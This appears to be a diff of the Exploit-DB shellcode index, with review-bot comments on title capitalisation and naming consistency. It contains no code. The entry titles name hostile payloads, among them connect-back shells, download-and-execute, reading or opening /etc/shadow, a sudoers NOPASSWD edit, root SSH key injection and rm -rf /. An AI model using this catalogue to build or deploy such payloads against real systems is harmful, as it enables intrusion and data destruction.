13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Shellcode Password Protected (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - connect-back semi-stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - 4919 port bind Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind Port 4919 Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
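Review bot: 13291 is renamed to 'Cisco IOS - Connectback Port 21 Shellcode', but the unchanged row 13297 in this same hunk still reads 'connect-back semi-stealth', and the hyphenated and two-word spellings survive elsewhere in the file; since the 13329 rename later in this commit also settles on 'Connectback', that spelling should be applied to 13297 here too, so the descriptions stay searchable under a single term. A second inconsistency inside the hunk: 13298 becomes 'Bind Port 4919' while 13282/13283 become 'Portbind Shellcode (Generator)' and 13278 'Connect Port 31337'; it would help to pick one pattern ('Bind Port NNNN' or 'Portbind Port NNNN') before more rows are touched.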
@ -15549,20 +15556,20 @@ id,file,description,date,author,platform,type,port
13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Portbind Port 8975 Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for Shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic Shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0
13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - Binding Port 4444 Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0
13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0
13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0
13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - 8000 Bind Port ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind Port 8000 & Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind Port 8000 & Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind Port 8000 ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
13320,platforms/lin_x86/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0
13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding & busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
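Review bot: the normalisation in this hunk is not internally consistent: 13313 becomes "Binding Port 4444" while 13317/13318/13319 become "Bind Port 8000" a few lines later; pick one form (the rest of the file leans to "Bind Port" / "Portbind Port"). The 13319 rename still reads "Bind Port 8000 ASM Code Linux Shellcode", repeating "Linux" and keeping the "ASM Code" filler; "Linux/x86 - Bind Port 8000 Shellcode (179 bytes)" says the same thing. Also visible here but untouched: 13320 is titled "Linux/x86-64 - setuid(0) + execve(/bin/sh)" yet sits under platforms/lin_x86 with platform lin_x86, whereas the other x86-64 entries (13463, 13464) live in platforms/lin_x86-64; worth checking whether the file path or the description is wrong before the next rename pass.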
@ -15572,8 +15579,8 @@ id,file,description,date,author,platform,type,port
13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
13328,platforms/lin_x86/shellcode/13328.c,"Linux/x86 - Shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - connect-back port UDP/54321 live packet capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback Port 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) & execve(/bin/sh_0_0) Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
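Review bot: 13330 is retitled "Append RSA key to /root/.ssh/authorized_keys2" but only the first word is capitalised, unlike the Title Case applied to the other renames in this commit ("Add User", "Bind Port", "Connectback Port"); "Append RSA Key to ..." would match. 13331 ("Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access") and 13332 ("Ho' Detector - Promiscuous mode detector") are left in the old lowercase style in the same hunk, so the pass is incomplete here.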
@ -15582,7 +15589,7 @@ id,file,description,date,author,platform,type,port
13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connect Back Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / attempts to block the process from being stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
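Review bot: the 13339 rename only changes "Connect Back" to "Connectback" and leaves "Port 8192.send.exit /etc/shadow", which is still unreadable; something like "Connectback Port 8192 + Send /etc/shadow + exit()" keeps the same content in the commit's own style. In the same hunk 13337 keeps "Connect back (140.115.53.35:9999)_ download a file (cb) and execute", i.e. the spelling this rename is removing plus the parenthesised address form dropped elsewhere, so the two entries should be treated together. Unchanged nits while here: 13340 "writes a php connectback shell" (lowercase "php"), and 13341 "rm -rf / attempts to block the process from being stopped" lacks any separator between the action and the comment.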
@ -15603,10 +15610,10 @@ id,file,description,date,author,platform,type,port
13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open and /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) and /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind Port 31337 Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Portbind 2707 Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0
13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() Portbind 31337/TCP Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - xor-encoded Connect Back (127.0.0.1:80) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
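Review bot: two adjacent renames pick different conventions: 13360 becomes "setuid/portbind Port 31337" while 13361 becomes "Portbind 2707" (no "Port", capital P), and 13363 "SET_PORT() Portbind 31337/TCP" is a third variant. 13364 "SET_IP() Connectback (192.168.13.22:31337)" and 13366 "xor-encoded Connect Back (127.0.0.1:80)" in the same hunk keep the parenthesised-address and two-word "Connect Back" forms that the rest of the commit is removing. 13362 has a typo in a context line, "Diassembly Obfuscation", that should be fixed in the same pass.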
@ -15616,8 +15623,8 @@ id,file,description,date,author,platform,type,port
13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Password Authentication portbind (64713) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - portbind (port 64713) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Password Authentication Portbind 64713 Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Portbind Port 64713 Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
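Review bot: 13373 drops the word "Port" ("Password Authentication Portbind 64713") while its neighbour 13374 keeps it ("Portbind Port 64713"); the two entries describe the same port and should read the same. The 13371/13372 pair ("/tmp/swr to SWAP restore", "SWAP store from /tmp/sws") and the three Gotfault execve entries 13375-13377 with their "_/bin/sh__ [_/bin/sh__ NULL]" quoting are untouched here, so the underscore-for-quote artefact survives this hunk.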
@ -15670,8 +15677,8 @@ id,file,description,date,author,platform,type,port
13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Portbind Port 5074 toupper Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
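Review bot: 13428 is retitled "Add User 't00r' encrypt" but the trailing "encrypt" stays lowercase while the very next line, 13429, keeps "chmod 666 shadow ENCRYPT" in all caps; both should use one form. 13427 "Portbind Port 5074 toupper" and the unchanged 13426 "symlink /bin/sh xoring" / 13430 "symlink . /bin/sh" sit in the same hunk and should get the same capitalisation pass now rather than in a later commit.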
@ -15691,9 +15698,9 @@ id,file,description,date,author,platform,type,port
13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Portbind Port 5074 Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Portbind Port 5074 + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0
13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
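Review bot: 13450 is changed from "Add user 't00r'" to "Add User 't00r'", but the next line, 13451 ("Add user Shellcode (104 bytes)"), is left with the lowercase form the rename just removed; it should be changed in the same hunk. 13448/13449 become "Portbind Port 5074" and "Portbind Port 5074 + fork()", which is consistent with each other but not with the "Portbind 2707" form chosen for 13361 earlier in this commit.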
@ -15706,7 +15713,7 @@ id,file,description,date,author,platform,type,port
13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bindshell Port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0
13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0
13466,platforms/multiple/shellcode/13466.c,"OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0
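Review bot: 13463 becomes "Bindshell Port 4444" while the x86 entries earlier in this commit use "Bind Port" / "Portbind Port" for the same thing; a single term across the lin_x86 and lin_x86-64 sections would make the file greppable. The context lines 13465/13466 ("execve(_/bin/sh__{_/bin/sh__NULL}_NULL)") still carry the underscore quoting artefact, and 13462 "break chroot setuid(0) + /bin/sh" keeps the old lowercase style next to the renamed line.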
@ -15714,12 +15721,12 @@ id,file,description,date,author,platform,type,port
13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0
13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0
13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0
13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - callback Shellcode (port 6666) (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Callback Port 6666 Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0
13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0
13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0
13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Portbind Port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0
13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0
13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh)_ exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
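Review bot: 13471 is renamed to "Callback Port 6666", which introduces a third spelling next to "Connectback" (13329, 13339 in this commit) and "Connect Back" (13366, unchanged); "Connectback Port 6666" matches the form the commit is standardising on. 13477 "OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)" in the same hunk is untouched although it is the most broken line here: the size is split around "Shellcode", the username uses the underscore artefact rather than the quotes this commit applies to 'slim' in 13523, and "Add user" is lowercase; "OpenBSD/x86 - Add User 'w00w00' Shellcode (112 bytes)" is the form the rest of the file uses.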
@ -15736,46 +15743,46 @@ id,file,description,date,author,platform,type,port
13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0
13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - portbind (port 6666) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Portbind Port 6666 Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Portbind Port 6789 Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac Shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Portbind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Portbind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0
13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
